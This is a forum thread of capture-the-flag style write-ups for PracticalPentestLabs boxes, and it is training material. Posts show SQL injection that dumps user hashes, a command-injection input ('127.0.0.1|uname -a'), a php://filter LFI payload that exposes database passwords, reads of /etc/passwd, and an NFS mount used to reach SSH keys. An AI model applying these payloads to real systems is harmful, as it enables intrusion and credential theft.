PracticalPentestLabs.com boxes writeups

h4x0r · June 10, 2017, 4:57am

Ok guys, I just changed the post title so we can have writeups for boxes inside that PracticalPentestLabs.com lab here

Writeup structure:

HOSTNAME: … / IP: …
[spoiler] writeup_text [/spoiler]

Cheers !

ricksanchez · June 10, 2017, 6:12pm

Never heard about it before. Seems quite new though and there is no about page at least none I could find at first sight. Might check it out when I have some spare time. So most likely not before mid August…

h4x0r · June 10, 2017, 7:30pm

Much appreciated Mr Rick !

cecu · June 10, 2017, 8:53pm

I never heard it. Thanks a lot

h4x0r · June 10, 2017, 10:43pm

No problem @cecu, if you successfully PWN “HIGINI” give us some hints … it’s a pain !

exploit · June 11, 2017, 12:54am

Thanks for the share! I just saw that ‘HAGINI’ and got command execution on it already, but i don’t know what to do with it, nothing to read

h4x0r · June 11, 2017, 1:16pm

Awesome, @exploit … yeah there isn’t a flag submission system there, they are working on it as per their latest tweet

We know the current UI and website interface are crappy, we are working on something new. In the meantime you can still join and practice
— PracticalPentestLabs (@ppentestlabs) June 10, 2017

Can you write a small walk-through on how you did "HIGINI" ?

DamaneDz · June 11, 2017, 4:44pm

HOSTNAME:C3PO
IP:10.0.1.6

I Found a SQLi in the Search Box

http://10.0.1.6/inc/search.php?query=xxx

By adding the single quotes you’ll get the Error message

I used SQLMap For Quick and Fast injection

as you see 3 types of injection …

Anyway

    select table_name FROM information_schema.tables where table_schema='vuln' [13]:
[*] adrbook
[*] eshop_goods
[*] eshop_orders
[*] flashgames
[*] log
[*] messages
[*] provozovny
[*] review_answers
[*] review_category
[*] review_questions
[*] statistics
[*] tickets
[*] users

select column_name from information_schema.columns where table_name='users' [10]:
[*] alterpass
[*] heslo
[*] id
[*] image
[*] isadmin
[*] login
[*] nick
[*] remail
[*] secondmail
[*] telefon

SELECT id,login,heslo,isadmin FROM users [13]:

[*] 1, karel, f196c5c9a5f002d14cfc2aafce74e39b, 0
[*] 2, jana, 3f858cf8cfd59f25010e71b6b5671428, 0
[*] 12, michal, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 13, Smolicek, 593a90797681ebd0b8c44315a4caf6ff, 0
[*] 14, jezinky, 4475987873e549d5208f8ad743fc3d07, 0
[*] 15, utocnik, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 18, uzivatel, 32250170a0dca92d53ec9624f336ca24, 0
[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1
[*] 23, prochy, 32f055ca38a83ecb670b04edb50016ad, 0
[*] 24, prochy2, 2d8883c2d85b14fdcb44e3b3dc959535, 0
[*] 25, butterfly2, 1adbb3178591fd5bb0c248518f39bf6d, 0
[*] 26, test, 098f6bcd4621d373cade4e832627b4f6, 0
[*] 27, qyqouxmg, ae219661afe50f60419afbe08c45947d, 0

The Only user Have admin privileges is admin himself

[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1

Login …

go to this option

and as we know The ping option use “system” function or “exec” or … so its clear that this box is vulnerable

Lemme check if its work first let ping the local ip address 127.0.0.1

Okay Cool

To Run many functions you have to use | as separator between them

The PHP code Must be like that

<?php echo system("ping {$_GET['host']}"); ?>

So Let’s Try to send this Request

127.0.0.1|uname -a

Works Fine

Whatever …

I Tried to upload a PHP Shell using “wget” but nothing …
I Read some PHP Files using “cat” command

That lead me to the config file named “base.php”

// .... PHP code
    $mysqlServer = 'localhost';
    $mysqlUser = 'vuln';
    $mysqlPassword = 'vuln';
    $mysqlName = 'vuln';
// .... PHP code

… To Be Continued

h4x0r · June 12, 2017, 6:01pm

Awesome, thank you guys. Looking forward for more

DamaneDz · June 12, 2017, 6:11pm

HOSTNAME:TADDEO
IP:10.0.3.10

Let’s add “name” as a parameter to our request

Nothing shown ! let’s add phpinfo.php

Looks Like (LFI) Local File Include …

Let’s Read config.php file via PHP Filter

php://filter/convert.base64-encode/resource=config.php

We’ll get base64 code

<?php
define( 'DB_NAME', 'test' );

/** MySQL database username */
define( 'DB_USER', 'taddeo' );

/** MySQL database password */
define( 'DB_PASSWORD', 'taddeo@321' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

?>

This is The Code After Decoding …

Now Let’s Read /etc/passwd FILE

view-source:http://10.0.3.10/file.php?name=/etc/passwd

I’m Trying To upload a PHP Shell

So i’ll update this post if there is anything important or i’ll try to solve another challenge !

andmuchmore · June 13, 2017, 4:10am

HOSTNAME:TADDEO
IP:10.0.3.10

Did the same as DamaneDz
Then I used the MySQL user to log in to ssh
Then managed to escalate my privs to root

I did a quick search for the flag but didnt have any luck.

Any ideas?

andmuchmore · June 13, 2017, 4:20am

HOSTNAME: RASIM
IP: 10.0.3.11

Quick nmap scan

Nmap scan report for 10.0.3.11

PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
2049/tcp open nfs

I tried to mount the nfs locally

mount 10.0.3.11:/ /test/

After a bit of digging around I found that /home/rasim/ had ssh keys in there.

Haven’t attemped to replace them yet but I am guess that should give us ssh access to the box.

Mosa_Tladi · June 13, 2017, 9:56am

10.0.1.6

Hi,

Should I not be able to ping my attack pc?

I am trying to get a shell but seeing that I am unable to even ping my PC the shell wont connect back or is this part of the challenge?

Thanks

h4x0r · June 13, 2017, 10:58am

Good job on TADDEO and RASIM I was able to get a shell the same way, although I did find the FLAG in the root/ directory of the host, I think you should check back when the hosts are reverted

10.0.1.6

Hi,

Should I not be able to ping my attack pc?

I am trying to get a shell but seeing that I am unable to even ping
my PC the shell wont connect back or is this part of the challenge?

Thanks

I think it’s part of the challenge, I was able to bypass that though

DamaneDz · June 13, 2017, 4:35pm

There is no hints in the challenges so I thought I have only to exploit them
anyway I solved the first part and you can solve the second

andmuchmore · June 14, 2017, 3:08am

Any hints on how you got root on C3PO?

I have have shell and I thought the overlayfs exploit might I couldn’t seem to get it to work. I also tried a few others and they just seemed to crash the server

_py · June 14, 2017, 4:29am

@pry0cc @oaktree: I believe this post needs to resume on IRC at this point.

h4x0r · June 14, 2017, 6:49pm

Why @_py ? is there a limit on how much replies per post ?

_py · June 14, 2017, 7:23pm

@h4x0r: Imagine me and 2-3 other folks tackling picoCTF, which lasts for 2 weeks, on the forum. It’d be much more convenient if you just hang out on IRC and at the same you won’t be shading other posts.

pry0cc · June 14, 2017, 8:59pm

I agree with @_py. The IRC is the ultimate place for figuring stuff out and solving problems. The forum is a place for discussion, perhaps writeups, how you did it, or one or two issues you may be facing. But a conversation about breaking it, that is a job for the IRC.

If you have ever used Facebook, would you have a conversation in the comment section? That is what this may be like.